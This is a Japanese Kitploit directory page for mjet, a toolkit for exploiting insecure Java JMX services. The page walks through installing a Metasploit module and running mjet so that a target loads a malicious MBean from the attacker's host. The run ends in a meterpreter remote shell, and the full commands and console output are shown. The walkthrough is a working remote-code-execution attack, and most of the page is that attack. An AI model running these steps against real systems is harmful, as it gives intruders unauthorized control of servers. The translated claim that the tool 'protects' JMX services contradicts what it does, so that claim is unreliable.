Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mogwaisec/mjet
エクスプロイトフレームワークペイロード生成エクスプロイトペネトレーションテスト設定ミスレッドチーミング
GitHubmogwaisec/mjet

mjet

Mogwai Java Management Extensions (JMX) エクスプロイトツールキット

リポジトリを見る
1743110年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

mjet

Mogwai Security Java Management Extensions (JMX) エクスプロイトツールキット

mjet は、安全でない設定の JMX サービスを保護するために使用できるツールです。これは、Braden Thomas/Accuvant によるブログ記事「Exploiting JMX-RMI」(http://www.accuvant.com/blog/exploiting-jmx-rmi) に基づいており、標的システム上で任意の Metasploit ペイロードを実行するために使用できます。

Mjet は当初、完全な攻撃ツールキットとして計画されていましたが、Metasploit の Github リポジトリに、ネイティブ ruby で基本的な Java RMI/シリアライゼーションサポートを提供するプルリクエストが含まれていることに気付きました。これは素晴らしく、Java への依存を排除します。そのため、このツールの開発を中止し、近い将来 Metasploit モジュールを作成することにしました。

mjet は以下の部分で構成されています:

  • "mlet Server" をエミュレートする Metasploit モジュール。これは基本的に、mlet タグを含む html ファイルをホストする Web サーバーです
  • mlet サーバーモジュールによって選択されたペイロードを含むように変更される ManagedBean
  • 安全でない JMX サービスに接続するために使用される jar アーカイブ。

インストール (Metasploit の github 版を使用)

  • "MBean" フォルダを "data/java/metasploit" にコピーします
  • java_mlet_server.rb を "modules/exploits/multi/misc/" にコピーします

使用方法

この例では以下のシステムを使用します: 攻撃者: 192.168.178.1 標的: 192.168.178.200、JMX サービスが tcp ポート 1616 で稼働

  • Metasploit モジュール "java_mlet_server" を設定/起動します。このモジュールはバックグラウンドジョブとして実行されます
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

mjet.jar を使用して脆弱な JMX サービスに接続し、MLet Web サーバーの URL を指定します...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

そして meterpreter シェルをお楽しみください :-)

ツールをダウンロード